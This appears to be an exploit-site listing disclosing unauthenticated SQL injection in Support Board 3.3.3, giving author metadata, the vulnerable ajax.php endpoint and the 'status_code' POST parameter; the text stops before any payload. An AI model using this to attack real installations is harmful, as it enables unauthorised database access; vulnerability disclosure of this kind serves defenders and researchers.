Support board 3.3.3 multiple sql injection (unauthenticated) Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2021-09-15 |
Type : webapps |
Platform : php
This exploit / vulnerability Support board 3.3.3 multiple sql injection (unauthenticated) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Support Board 3.3.3 - 'Multiple' SQL Injection (Unauthenticated)
# Date: 29.08.2021
# Exploit Author: John Jefferson Li <yiyohwi@naver.com>
# Vendor Homepage: https://board.support/
# Software Link: https://codecanyon.net/item/support-board-help-desk-and-chat/20359943
# Version: 3.3.3
# Tested on: Ubuntu 20.04.2 LTS
----- PoC 1: Error Based SQLi (status_code) -----
Request
POST /wp-content/plugins/supportboard/supportboard/include/ajax.php HTTP/1.1
Vulnerable Parameter: status_code (POST)